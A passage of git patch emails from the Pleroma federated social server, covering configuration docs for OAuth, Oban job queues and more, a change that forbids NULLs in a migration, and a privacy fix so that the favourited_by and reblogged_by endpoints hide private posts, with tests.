+* For Facebook, [register an app](https://developers.facebook.com/apps), configure callback URL to https:///oauth/facebook/callback, enable Facebook Login service at https://developers.facebook.com/apps//fb-login/settings/
+
+* For Google, [register an app](https://console.developers.google.com), configure callback URL to https:///oauth/google/callback
+
+* For Microsoft, [register an app](https://portal.azure.com), configure callback URL to https:///oauth/microsoft/callback
+
+Once the app is configured on external OAuth provider side, add app's credentials and strategy-specific settings (if any — e.g. see Microsoft below) to `config/prod.secret.exs`,
+per strategy's documentation (e.g. [ueberauth_twitter](https://github.com/ueberauth/ueberauth_twitter)). Example config basing on environment variables:
+
+```elixir
+# Twitter
+config :ueberauth, Ueberauth.Strategy.Twitter.OAuth,
+ consumer_key: System.get_env("TWITTER_CONSUMER_KEY"),
+ consumer_secret: System.get_env("TWITTER_CONSUMER_SECRET")
+
+# Facebook
+config :ueberauth, Ueberauth.Strategy.Facebook.OAuth,
+ client_id: System.get_env("FACEBOOK_APP_ID"),
+ client_secret: System.get_env("FACEBOOK_APP_SECRET"),
+ redirect_uri: System.get_env("FACEBOOK_REDIRECT_URI")
+
+# Google
+config :ueberauth, Ueberauth.Strategy.Google.OAuth,
+ client_id: System.get_env("GOOGLE_CLIENT_ID"),
+ client_secret: System.get_env("GOOGLE_CLIENT_SECRET"),
+ redirect_uri: System.get_env("GOOGLE_REDIRECT_URI")
+
+# Microsoft
+config :ueberauth, Ueberauth.Strategy.Microsoft.OAuth,
+ client_id: System.get_env("MICROSOFT_CLIENT_ID"),
+ client_secret: System.get_env("MICROSOFT_CLIENT_SECRET")
+
+config :ueberauth, Ueberauth,
+ providers: [
+ microsoft: {Ueberauth.Strategy.Microsoft, [callback_params: []]}
+ ]
+
+# Keycloak
+# Note: make sure to add `keycloak:ueberauth_keycloak_strategy` entry to `OAUTH_CONSUMER_STRATEGIES` environment variable
+keycloak_url = "https://publicly-reachable-keycloak-instance.org:8080"
+
+config :ueberauth, Ueberauth.Strategy.Keycloak.OAuth,
+ client_id: System.get_env("KEYCLOAK_CLIENT_ID"),
+ client_secret: System.get_env("KEYCLOAK_CLIENT_SECRET"),
+ site: keycloak_url,
+ authorize_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/auth",
+ token_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/token",
+ userinfo_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/userinfo",
+ token_method: :post
+
+config :ueberauth, Ueberauth,
+ providers: [
+ keycloak: {Ueberauth.Strategy.Keycloak, [uid_field: :email]}
+ ]
+```
+
+## OAuth 2.0 provider - :oauth2
+
+Configure OAuth 2 provider capabilities:
+
+* `token_expires_in` - The lifetime in seconds of the access token.
+* `issue_new_refresh_token` - Keeps old refresh token or generate new refresh token when to obtain an access token.
+* `clean_expired_tokens` - Enable a background job to clean expired oauth tokens. Defaults to `false`.
+* `clean_expired_tokens_interval` - Interval to run the job to clean expired tokens. Defaults to `86_400_000` (24 hours).
+
+## :emoji
+* `shortcode_globs`: Location of custom emoji files. `*` can be used as a wildcard. Example `["/emoji/custom/**/*.png"]`
+* `pack_extensions`: A list of file extensions for emojis, when no emoji.txt for a pack is present. Example `[".png", ".gif"]`
+* `groups`: Emojis are ordered in groups (tags). This is an array of key-value pairs where the key is the groupname and the value the location or array of locations. `*` can be used as a wildcard. Example `[Custom: ["/emoji/*.png", "/emoji/custom/*.png"]]`
+* `default_manifest`: Location of the JSON-manifest. This manifest contains information about the emoji-packs you can download. Currently only one manifest can be added (no arrays).
+
+## Database options
+
+### RUM indexing for full text search
+* `rum_enabled`: If RUM indexes should be used. Defaults to `false`.
+
+RUM indexes are an alternative indexing scheme that is not included in PostgreSQL by default. While they may eventually be mainlined, for now they have to be installed as a PostgreSQL extension from https://github.com/postgrespro/rum.
+
+Their advantage over the standard GIN indexes is that they allow efficient ordering of search results by timestamp, which makes search queries a lot faster on larger servers, by one or two orders of magnitude. They take up around 3 times as much space as GIN indexes.
+
+To enable them, both the `rum_enabled` flag has to be set and the following special migration has to be run:
+
+`mix ecto.migrate --migrations-path priv/repo/optional_migrations/rum_indexing/`
+
+This will probably take a long time.
+
+## :rate_limit
+
+This is an advanced feature and disabled by default.
+
+A keyword list of rate limiters where a key is a limiter name and value is the limiter configuration. The basic configuration is a tuple where:
+
+* The first element: `scale` (Integer). The time scale in milliseconds.
+* The second element: `limit` (Integer). How many requests to limit in the time scale provided.
+
+It is also possible to have different limits for unauthenticated and authenticated users: the keyword value must be a list of two tuples where the first one is a config for unauthenticated users and the second one is for authenticated.
+
+See [`Pleroma.Plugs.RateLimiter`](Pleroma.Plugs.RateLimiter.html) documentation for examples.
+
+Supported rate limiters:
+
+* `:search` for the search requests (account & status search etc.)
+* `:app_account_creation` for registering user accounts from the same IP address
+* `:relations_actions` for actions on relations with all users (follow, unfollow)
+* `:relation_id_action` for actions on relation with a specific user (follow, unfollow)
+* `:statuses_actions` for create / delete / fav / unfav / reblog / unreblog actions on any statuses
+* `:status_id_action` for fav / unfav or reblog / unreblog actions on the same status by the same user
+
+## :web_cache_ttl
+
+The expiration time for the web responses cache. Values should be in milliseconds or `nil` to disable expiration.
+
+Available caches:
+
+* `:activity_pub` - activity pub routes (except question activities). Defaults to `nil` (no expiration).
+* `:activity_pub_question` - activity pub routes (question activities). Defaults to `30_000` (30 seconds).
From 4da0da9aa46f0970735f398a1786902f4e3a86eb Mon Sep 17 00:00:00 2001
From: Alex S
Date: Fri, 13 Sep 2019 19:13:04 +0300
Subject: [PATCH 067/272] don't track generated_config.md
---
.gitignore | 1 +
1 file changed, 1 insertion(+)
diff --git a/.gitignore b/.gitignore
index 9591f9976..4e71a7df0 100644
--- a/.gitignore
+++ b/.gitignore
@@ -38,6 +38,7 @@ erl_crash.dump
# Prevent committing docs files
/priv/static/doc/*
+docs/generated_config.md
# Code test coverage
/cover
From ac4a748fad34c02647bf72e802cd9d74205681fe Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 19:28:35 +0300
Subject: [PATCH 068/272] Disallow NULLs in deliveries
---
lib/pleroma/delivery.ex | 1 +
priv/repo/migrations/20190912065617_create_deliveries.exs | 4 ++--
2 files changed, 3 insertions(+), 2 deletions(-)
diff --git a/lib/pleroma/delivery.ex b/lib/pleroma/delivery.ex
index 38c148c34..29a1e5a77 100644
--- a/lib/pleroma/delivery.ex
+++ b/lib/pleroma/delivery.ex
@@ -23,6 +23,7 @@ defmodule Pleroma.Delivery do
def changeset(delivery, params \\ %{}) do
delivery
|> cast(params, [:user_id, :object_id])
+ |> validate_required([:user_id, :object_id])
|> foreign_key_constraint(:object_id)
|> foreign_key_constraint(:user_id)
|> unique_constraint(:user_id, name: :deliveries_user_id_object_id_index)
diff --git a/priv/repo/migrations/20190912065617_create_deliveries.exs b/priv/repo/migrations/20190912065617_create_deliveries.exs
index 92ca5650a..79071a799 100644
--- a/priv/repo/migrations/20190912065617_create_deliveries.exs
+++ b/priv/repo/migrations/20190912065617_create_deliveries.exs
@@ -3,8 +3,8 @@ defmodule Pleroma.Repo.Migrations.CreateDeliveries do
def change do
create_if_not_exists table(:deliveries) do
- add(:object_id, references(:objects, type: :id))
- add(:user_id, references(:users, type: :uuid, on_delete: :delete_all))
+ add(:object_id, references(:objects, type: :id), null: false)
+ add(:user_id, references(:users, type: :uuid, on_delete: :delete_all), null: false)
end
create_if_not_exists index(:deliveries, :object_id, name: :deliveries_object_id)
create_if_not_exists(unique_index(:deliveries, [:user_id, :object_id]))
From 5c5ebd38619bb853a58374918fd8983569ba7c0b Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Sat, 14 Sep 2019 01:50:15 +0300
Subject: [PATCH 069/272] Mastodon API: Respect post privacy in
favourited/reblogged endpoints
---
CHANGELOG.md | 1 +
.../controllers/mastodon_api_controller.ex | 4 ++
.../mastodon_api_controller_test.exs | 53 ++++++++++++++++++-
3 files changed, 56 insertions(+), 2 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 7fe3bf687..0c5e43123 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
### Security
- OStatus: eliminate the possibility of a protocol downgrade attack.
- OStatus: prevent following locked accounts, bypassing the approval process.
+- Mastodon API: respect post privacy in `/api/v1/statuses/:id/{favourited,reblogged}_by`
### Removed
- **Breaking:** GNU Social API with Qvitter extensions support
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 0940e07a6..060137b80 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -842,6 +842,7 @@ def get_mascot(%{assigns: %{user: user}} = conn, _params) do
def favourited_by(%{assigns: %{user: user}} = conn, %{"id" => id}) do
with %Activity{} = activity <- Activity.get_by_id_with_object(id),
+ {:visible, true} <- {:visible, Visibility.visible_for_user?(activity, user)},
%Object{data: %{"likes" => likes}} <- Object.normalize(activity) do
q = from(u in User, where: u.ap_id in ^likes)
@@ -853,12 +854,14 @@ def favourited_by(%{assigns: %{user: user}} = conn, %{"id" => id}) do
|> put_view(AccountView)
|> render("accounts.json", %{for: user, users: users, as: :user})
else
+ {:visible, false} -> {:error, :not_found}
_ -> json(conn, [])
end
end
def reblogged_by(%{assigns: %{user: user}} = conn, %{"id" => id}) do
with %Activity{} = activity <- Activity.get_by_id_with_object(id),
+ {:visible, true} <- {:visible, Visibility.visible_for_user?(activity, user)},
%Object{data: %{"announcements" => announces}} <- Object.normalize(activity) do
q = from(u in User, where: u.ap_id in ^announces)
@@ -870,6 +873,7 @@ def reblogged_by(%{assigns: %{user: user}} = conn, %{"id" => id}) do
|> put_view(AccountView)
|> render("accounts.json", %{for: user, users: users, as: :user})
else
+ {:visible, false} -> {:error, :not_found}
_ -> json(conn, [])
end
end
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 806ae7e69..c9bce1439 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -3698,7 +3698,7 @@ test "returns 404 when poll is private and not available for user", %{conn: conn
build_conn()
|> assign(:user, user)
- [conn: conn, activity: activity]
+ [conn: conn, activity: activity, user: user]
end
test "returns users who have favorited the status", %{conn: conn, activity: activity} do
@@ -3758,6 +3758,32 @@ test "does not fail on an unauthenticated request", %{conn: conn, activity: acti
[%{"id" => id}] = response
assert id == other_user.id
end
+
+ test "requires authentifucation for private posts", %{conn: conn, user: user} do
+ other_user = insert(:user)
+
+ {:ok, activity} =
+ CommonAPI.post(user, %{
+ "status" => "@#{other_user.nickname} wanna get some #cofe together?",
+ "visibility" => "direct"
+ })
+
+ {:ok, _, _} = CommonAPI.favorite(activity.id, other_user)
+
+ conn
+ |> assign(:user, nil)
+ |> get("/api/v1/statuses/#{activity.id}/favourited_by")
+ |> json_response(404)
+
+ response =
+ build_conn()
+ |> assign(:user, other_user)
+ |> get("/api/v1/statuses/#{activity.id}/favourited_by")
+ |> json_response(200)
+
+ [%{"id" => id}] = response
+ assert id == other_user.id
+ end
end
describe "GET /api/v1/statuses/:id/reblogged_by" do
@@ -3769,7 +3795,7 @@ test "does not fail on an unauthenticated request", %{conn: conn, activity: acti
build_conn()
|> assign(:user, user)
- [conn: conn, activity: activity]
+ [conn: conn, activity: activity, user: user]
end
test "returns users who have reblogged the status", %{conn: conn, activity: activity} do
@@ -3829,6 +3855,29 @@ test "does not fail on an unauthenticated request", %{conn: conn, activity: acti
[%{"id" => id}] = response
assert id == other_user.id
end
+
+ test "requires authentifucation for private posts", %{conn: conn, user: user} do
+ other_user = insert(:user)
+
+ {:ok, activity} =
+ CommonAPI.post(user, %{
+ "status" => "@#{other_user.nickname} wanna get some #cofe together?",
+ "visibility" => "direct"
+ })
+
+ conn
+ |> assign(:user, nil)
+ |> get("/api/v1/statuses/#{activity.id}/reblogged_by")
+ |> json_response(404)
+
+ response =
+ build_conn()
+ |> assign(:user, other_user)
+ |> get("/api/v1/statuses/#{activity.id}/reblogged_by")
+ |> json_response(200)
+
+ assert [] == response
+ end
end
describe "POST /auth/password, with valid parameters" do
From 85b6144ffd9e96fc79608847fe739a40ca094207 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Sat, 14 Sep 2019 10:46:35 +0000
Subject: [PATCH 070/272] Apply suggestion to
test/web/mastodon_api/mastodon_api_controller_test.exs
---
test/web/mastodon_api/mastodon_api_controller_test.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index c9bce1439..013a838b8 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -3759,7 +3759,7 @@ test "does not fail on an unauthenticated request", %{conn: conn, activity: acti
assert id == other_user.id
end
- test "requires authentifucation for private posts", %{conn: conn, user: user} do
+ test "requires authentification for private posts", %{conn: conn, user: user} do
other_user = insert(:user)
{:ok, activity} =
From a78a7ee455c4e8f4c2aab15a15626237b2b90399 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Sat, 14 Sep 2019 10:50:08 +0000
Subject: [PATCH 071/272] Apply suggestion to
test/web/mastodon_api/mastodon_api_controller_test.exs
---
test/web/mastodon_api/mastodon_api_controller_test.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 013a838b8..061c3a8ad 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -3856,7 +3856,7 @@ test "does not fail on an unauthenticated request", %{conn: conn, activity: acti
assert id == other_user.id
end
- test "requires authentifucation for private posts", %{conn: conn, user: user} do
+ test "requires authentification for private posts", %{conn: conn, user: user} do
other_user = insert(:user)
{:ok, activity} =
From b870ae08fd19acd7c40e4353e657e6a1ed1b34c5 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Sat, 14 Sep 2019 19:31:20 +0700
Subject: [PATCH 072/272] Fix `Activity.all_by_actor_and_id/2` test
---
test/activity_test.exs | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/test/activity_test.exs b/test/activity_test.exs
index f9f789a76..275cab81e 100644
--- a/test/activity_test.exs
+++ b/test/activity_test.exs
@@ -213,7 +213,11 @@ test "all_by_actor_and_id/2" do
assert [] == Activity.all_by_actor_and_id(user, [])
- assert [%Activity{id: ^id2}, %Activity{id: ^id1}] =
- Activity.all_by_actor_and_id(user.ap_id, [id1, id2])
+ activities =
+ user.ap_id
+ |> Activity.all_by_actor_and_id([id1, id2])
+ |> Enum.sort(&(&1.id < &2.id))
+
+ assert [%Activity{id: ^id1}, %Activity{id: ^id2}] = activities
end
end
From e127b9ab6d01da48ebad188d2b9fcf7cb8a41578 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Sat, 14 Sep 2019 16:28:59 +0300
Subject: [PATCH 073/272] [#1149] Rewritten readme as config/description.exs.
---
config/description.exs | 198 ++++++++++++++++++++++++++---------------
1 file changed, 126 insertions(+), 72 deletions(-)
diff --git a/config/description.exs b/config/description.exs
index c5ae63915..be5eb0cc3 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -1778,87 +1778,141 @@
group: :pleroma_job_queue,
key: :queues,
type: :group,
- description: "Pleroma Job Queue configuration: a list of queues with maximum concurrent jobs",
- children: [
- %{
- key: :federator_outgoing,
- type: :integer,
- description: "Outgoing federation queue",
- suggestions: [50]
- },
- %{
- key: :federator_incoming,
- type: :integer,
- description: "Incoming federation queue",
- suggestions: [50]
- },
- %{
- key: :mailer,
- type: :integer,
- description: "Email sender queue, see Pleroma.Emails.Mailer",
- suggestions: [10]
- },
- %{
- key: :web_push,
- type: :integer,
- description: "Web push notifications queue",
- suggestions: [50]
- },
- %{
- key: :transmogrifier,
- type: :integer,
- description: "Transmogrifier queue",
- suggestions: [20]
- },
- %{
- key: :scheduled_activities,
- type: :integer,
- description: "Scheduled activities queue, see Pleroma.ScheduledActivities",
- suggestions: [10]
- },
- %{
- key: :activity_expiration,
- type: :integer,
- description: "Activity expiration queue",
- suggestions: [10]
- },
- %{
- key: :background,
- type: :integer,
- description: "Background queue",
- suggestions: [5]
- }
- ]
+ description: "[Deprecated] Replaced with `Oban`/`:queues` (keeping the same format)",
+ children: []
},
%{
group: :pleroma,
key: Pleroma.Web.Federator.RetryQueue,
type: :group,
- description: "",
+ description: "[Deprecated] See `Oban` and `:workers` sections for configuration notes",
children: [
- %{
- key: :enabled,
- type: :boolean,
- description: "If set to true, failed federation jobs will be retried",
- suggestions: [true, false]
- },
- %{
- key: :max_jobs,
- type: :integer,
- description: "The maximum amount of parallel federation jobs running at the same time",
- suggestions: [20]
- },
- %{
- key: :initial_timeout,
- type: :integer,
- description: "The initial timeout in seconds",
- suggestions: [30]
- },
%{
key: :max_retries,
type: :integer,
- description: "The maximum number of times a federation job is retried",
- suggestions: [5]
+ description: "[Deprecated] Replaced as `Oban`/`:queues`/`:outgoing_federation` value",
+ suggestions: []
+ }
+ ]
+ },
+ %{
+ group: :pleroma,
+ key: Oban,
+ type: :group,
+ description: """
+ [Oban](https://github.com/sorentwo/oban) asynchronous job processor configuration.
+
+ Note: if you are running PostgreSQL in [`silent_mode`](https://postgresqlco.nf/en/doc/param/silent_mode?version=9.1),
+ it's advised to set [`log_destination`](https://postgresqlco.nf/en/doc/param/log_destination?version=9.1) to `syslog`,
+ otherwise `postmaster.log` file may grow because of "you don't own a lock of type ShareLock" warnings
+ (see https://github.com/sorentwo/oban/issues/52).
+ """,
+ children: [
+ %{
+ key: :repo,
+ type: :module,
+ description: "Application's Ecto repo",
+ suggestions: [Pleroma.Repo]
+ },
+ %{
+ key: :verbose,
+ type: :boolean,
+ description: "Logs verbose mode",
+ suggestions: [false, true]
+ },
+ %{
+ key: :prune,
+ type: [:atom, :tuple],
+ description:
+ "Non-retryable jobs [pruning settings](https://github.com/sorentwo/oban#pruning)",
+ suggestions: [:disabled, {:maxlen, 1500}, {:maxage, 60 * 60}]
+ },
+ %{
+ key: :queues,
+ type: :keyword,
+ description:
+ "Background jobs queues (keys: queues, values: max numbers of concurrent jobs)",
+ suggestions: [
+ [
+ activity_expiration: 10,
+ background: 5,
+ federator_incoming: 50,
+ federator_outgoing: 50,
+ mailer: 10,
+ scheduled_activities: 10,
+ transmogrifier: 20,
+ web_push: 50
+ ]
+ ],
+ children: [
+ %{
+ key: :activity_expiration,
+ type: :integer,
+ description: "Activity expiration queue",
+ suggestions: [10]
+ },
+ %{
+ key: :background,
+ type: :integer,
+ description: "Background queue",
+ suggestions: [5]
+ },
+ %{
+ key: :federator_incoming,
+ type: :integer,
+ description: "Incoming federation queue",
+ suggestions: [50]
+ },
+ %{
+ key: :federator_outgoing,
+ type: :integer,
+ description: "Outgoing federation queue",
+ suggestions: [50]
+ },
+ %{
+ key: :mailer,
+ type: :integer,
+ description: "Email sender queue, see Pleroma.Emails.Mailer",
+ suggestions: [10]
+ },
+ %{
+ key: :scheduled_activities,
+ type: :integer,
+ description: "Scheduled activities queue, see Pleroma.ScheduledActivities",
+ suggestions: [10]
+ },
+ %{
+ key: :transmogrifier,
+ type: :integer,
+ description: "Transmogrifier queue",
+ suggestions: [20]
+ },
+ %{
+ key: :web_push,
+ type: :integer,
+ description: "Web push notifications queue",
+ suggestions: [50]
+ }
+ ]
+ }
+ ]
+ },
+ %{
+ group: :pleroma,
+ key: :workers,
+ type: :group,
+ description: "Includes custom worker options not interpretable directly by `Oban`",
+ children: [
+ %{
+ key: :retries,
+ type: :keyword,
+ description: "Max retry attempts for failed jobs, per `Oban` queue",
+ suggestions: [
+ [
+ federator_incoming: 5,
+ federator_outgoing: 5
+ ]
+ ]
}
]
},
From 3b8ec98b0e3b3fb2bd333f3be724676c4821366f Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Sun, 15 Sep 2019 10:15:57 +0300
Subject: [PATCH 074/272] [#1149] Reinstated docs/config.md changes.
---
docs/config.md | 1456 +++++++++++++++++++++++++-----------------------
1 file changed, 755 insertions(+), 701 deletions(-)
diff --git a/docs/config.md b/docs/config.md
index 066547bb1..270d7fcea 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -1,701 +1,755 @@
-# Configuration
-
-This file describe the configuration, it is recommended to edit the relevant *.secret.exs file instead of the others founds in the ``config`` directory.
-If you run Pleroma with ``MIX_ENV=prod`` the file is ``prod.secret.exs``, otherwise it is ``dev.secret.exs``.
-
-## Pleroma.Upload
-* `uploader`: Select which `Pleroma.Uploaders` to use
-* `filters`: List of `Pleroma.Upload.Filter` to use.
-* `link_name`: When enabled Pleroma will add a `name` parameter to the url of the upload, for example `https://instance.tld/media/corndog.png?name=corndog.png`. This is needed to provide the correct filename in Content-Disposition headers when using filters like `Pleroma.Upload.Filter.Dedupe`
-* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host.
-* `proxy_remote`: If you're using a remote uploader, Pleroma will proxy media requests instead of redirecting to it.
-* `proxy_opts`: Proxy options, see `Pleroma.ReverseProxy` documentation.
-
-Note: `strip_exif` has been replaced by `Pleroma.Upload.Filter.Mogrify`.
-
-## Pleroma.Uploaders.Local
-* `uploads`: Which directory to store the user-uploads in, relative to pleroma’s working directory
-
-## Pleroma.Uploaders.S3
-* `bucket`: S3 bucket name
-* `bucket_namespace`: S3 bucket namespace
-* `public_endpoint`: S3 endpoint that the user finally accesses(ex. "https://s3.dualstack.ap-northeast-1.amazonaws.com")
-* `truncated_namespace`: If you use S3 compatible service such as Digital Ocean Spaces or CDN, set folder name or "" etc.
-For example, when using CDN to S3 virtual host format, set "".
-At this time, write CNAME to CDN in public_endpoint.
-
-## Pleroma.Upload.Filter.Mogrify
-
-* `args`: List of actions for the `mogrify` command like `"strip"` or `["strip", "auto-orient", {"implode", "1"}]`.
-
-## Pleroma.Upload.Filter.Dedupe
-
-No specific configuration.
-
-## Pleroma.Upload.Filter.AnonymizeFilename
-
-This filter replaces the filename (not the path) of an upload. For complete obfuscation, add
-`Pleroma.Upload.Filter.Dedupe` before AnonymizeFilename.
-
-* `text`: Text to replace filenames in links. If empty, `{random}.extension` will be used. You can get the original filename extension by using `{extension}`, for example `custom-file-name.{extension}`.
-
-## Pleroma.Emails.Mailer
-* `adapter`: one of the mail adapters listed in [Swoosh readme](https://github.com/swoosh/swoosh#adapters), or `Swoosh.Adapters.Local` for in-memory mailbox.
-* `api_key` / `password` and / or other adapter-specific settings, per the above documentation.
-* `enabled`: Allows enable/disable send emails. Default: `false`.
-
-An example for Sendgrid adapter:
-
-```elixir
-config :pleroma, Pleroma.Emails.Mailer,
- adapter: Swoosh.Adapters.Sendgrid,
- api_key: "YOUR_API_KEY"
-```
-
-An example for SMTP adapter:
-
-```elixir
-config :pleroma, Pleroma.Emails.Mailer,
- adapter: Swoosh.Adapters.SMTP,
- relay: "smtp.gmail.com",
- username: "YOUR_USERNAME@gmail.com",
- password: "YOUR_SMTP_PASSWORD",
- port: 465,
- ssl: true,
- tls: :always,
- auth: :always
-```
-
-## :uri_schemes
-* `valid_schemes`: List of the scheme part that is considered valid to be an URL
-
-## :instance
-* `name`: The instance’s name
-* `email`: Email used to reach an Administrator/Moderator of the instance
-* `notify_email`: Email used for notifications.
-* `description`: The instance’s description, can be seen in nodeinfo and ``/api/v1/instance``
-* `limit`: Posts character limit (CW/Subject included in the counter)
-* `remote_limit`: Hard character limit beyond which remote posts will be dropped.
-* `upload_limit`: File size limit of uploads (except for avatar, background, banner)
-* `avatar_upload_limit`: File size limit of user’s profile avatars
-* `background_upload_limit`: File size limit of user’s profile backgrounds
-* `banner_upload_limit`: File size limit of user’s profile banners
-* `poll_limits`: A map with poll limits for **local** polls
- * `max_options`: Maximum number of options
- * `max_option_chars`: Maximum number of characters per option
- * `min_expiration`: Minimum expiration time (in seconds)
- * `max_expiration`: Maximum expiration time (in seconds)
-* `registrations_open`: Enable registrations for anyone, invitations can be enabled when false.
-* `invites_enabled`: Enable user invitations for admins (depends on `registrations_open: false`).
-* `account_activation_required`: Require users to confirm their emails before signing in.
-* `federating`: Enable federation with other instances
-* `federation_incoming_replies_max_depth`: Max. depth of reply-to activities fetching on incoming federation, to prevent out-of-memory situations while fetching very long threads. If set to `nil`, threads of any depth will be fetched. Lower this value if you experience out-of-memory crashes.
-* `federation_reachability_timeout_days`: Timeout (in days) of each external federation target being unreachable prior to pausing federating to it.
-* `allow_relay`: Enable Pleroma’s Relay, which makes it possible to follow a whole instance
-* `rewrite_policy`: Message Rewrite Policy, either one or a list. Here are the ones available by default:
- * `Pleroma.Web.ActivityPub.MRF.NoOpPolicy`: Doesn’t modify activities (default)
- * `Pleroma.Web.ActivityPub.MRF.DropPolicy`: Drops all activities. It generally doesn’t makes sense to use in production
- * `Pleroma.Web.ActivityPub.MRF.SimplePolicy`: Restrict the visibility of activities from certains instances (See ``:mrf_simple`` section)
- * `Pleroma.Web.ActivityPub.MRF.TagPolicy`: Applies policies to individual users based on tags, which can be set using pleroma-fe/admin-fe/any other app that supports Pleroma Admin API. For example it allows marking posts from individual users nsfw (sensitive)
- * `Pleroma.Web.ActivityPub.MRF.SubchainPolicy`: Selectively runs other MRF policies when messages match (see ``:mrf_subchain`` section)
- * `Pleroma.Web.ActivityPub.MRF.RejectNonPublic`: Drops posts with non-public visibility settings (See ``:mrf_rejectnonpublic`` section)
- * `Pleroma.Web.ActivityPub.MRF.EnsureRePrepended`: Rewrites posts to ensure that replies to posts with subjects do not have an identical subject and instead begin with re:.
- * `Pleroma.Web.ActivityPub.MRF.AntiLinkSpamPolicy`: Rejects posts from likely spambots by rejecting posts from new users that contain links.
- * `Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy`: Crawls attachments using their MediaProxy URLs so that the MediaProxy cache is primed.
- * `Pleroma.Web.ActivityPub.MRF.MentionPolicy`: Drops posts mentioning configurable users. (see `:mrf_mention` section)
- * `Pleroma.Web.ActivityPub.MRF.VocabularyPolicy`: Restricts activities to a configured set of vocabulary. (see `:mrf_vocabulary` section)
-* `public`: Makes the client API in authentificated mode-only except for user-profiles. Useful for disabling the Local Timeline and The Whole Known Network.
-* `quarantined_instances`: List of ActivityPub instances where private(DMs, followers-only) activities will not be send.
-* `managed_config`: Whenether the config for pleroma-fe is configured in this config or in ``static/config.json``
-* `allowed_post_formats`: MIME-type list of formats allowed to be posted (transformed into HTML)
-* `mrf_transparency`: Make the content of your Message Rewrite Facility settings public (via nodeinfo).
-* `mrf_transparency_exclusions`: Exclude specific instance names from MRF transparency. The use of the exclusions feature will be disclosed in nodeinfo as a boolean value.
-* `scope_copy`: Copy the scope (private/unlisted/public) in replies to posts by default.
-* `subject_line_behavior`: Allows changing the default behaviour of subject lines in replies. Valid values:
- * "email": Copy and preprend re:, as in email.
- * "masto": Copy verbatim, as in Mastodon.
- * "noop": Don't copy the subject.
-* `always_show_subject_input`: When set to false, auto-hide the subject field when it's empty.
-* `extended_nickname_format`: Set to `true` to use extended local nicknames format (allows underscores/dashes). This will break federation with
- older software for theses nicknames.
-* `max_pinned_statuses`: The maximum number of pinned statuses. `0` will disable the feature.
-* `autofollowed_nicknames`: Set to nicknames of (local) users that every new user should automatically follow.
-* `no_attachment_links`: Set to true to disable automatically adding attachment link text to statuses
-* `welcome_message`: A message that will be send to a newly registered users as a direct message.
-* `welcome_user_nickname`: The nickname of the local user that sends the welcome message.
-* `max_report_comment_size`: The maximum size of the report comment (Default: `1000`)
-* `safe_dm_mentions`: If set to true, only mentions at the beginning of a post will be used to address people in direct messages. This is to prevent accidental mentioning of people when talking about them (e.g. "@friend hey i really don't like @enemy"). Default: `false`.
-* `healthcheck`: If set to true, system data will be shown on ``/api/pleroma/healthcheck``.
-* `remote_post_retention_days`: The default amount of days to retain remote posts when pruning the database.
-* `user_bio_length`: A user bio maximum length (default: `5000`)
-* `user_name_length`: A user name maximum length (default: `100`)
-* `skip_thread_containment`: Skip filter out broken threads. The default is `false`.
-* `limit_to_local_content`: Limit unauthenticated users to search for local statutes and users only. Possible values: `:unauthenticated`, `:all` and `false`. The default is `:unauthenticated`.
-* `dynamic_configuration`: Allow transferring configuration to DB with the subsequent customization from Admin api.
-* `max_account_fields`: The maximum number of custom fields in the user profile (default: `10`)
-* `max_remote_account_fields`: The maximum number of custom fields in the remote user profile (default: `20`)
-* `account_field_name_length`: An account field name maximum length (default: `512`)
-* `account_field_value_length`: An account field value maximum length (default: `512`)
-* `external_user_synchronization`: Enabling following/followers counters synchronization for external users.
-
-
-
-## :logger
-* `backends`: `:console` is used to send logs to stdout, `{ExSyslogger, :ex_syslogger}` to log to syslog, and `Quack.Logger` to log to Slack
-
-An example to enable ONLY ExSyslogger (f/ex in ``prod.secret.exs``) with info and debug suppressed:
-```elixir
-config :logger,
- backends: [{ExSyslogger, :ex_syslogger}]
-
-config :logger, :ex_syslogger,
- level: :warn
-```
-
-Another example, keeping console output and adding the pid to syslog output:
-```elixir
-config :logger,
- backends: [:console, {ExSyslogger, :ex_syslogger}]
-
-config :logger, :ex_syslogger,
- level: :warn,
- option: [:pid, :ndelay]
-```
-
-See: [logger’s documentation](https://hexdocs.pm/logger/Logger.html) and [ex_syslogger’s documentation](https://hexdocs.pm/ex_syslogger/)
-
-An example of logging info to local syslog, but warn to a Slack channel:
-```elixir
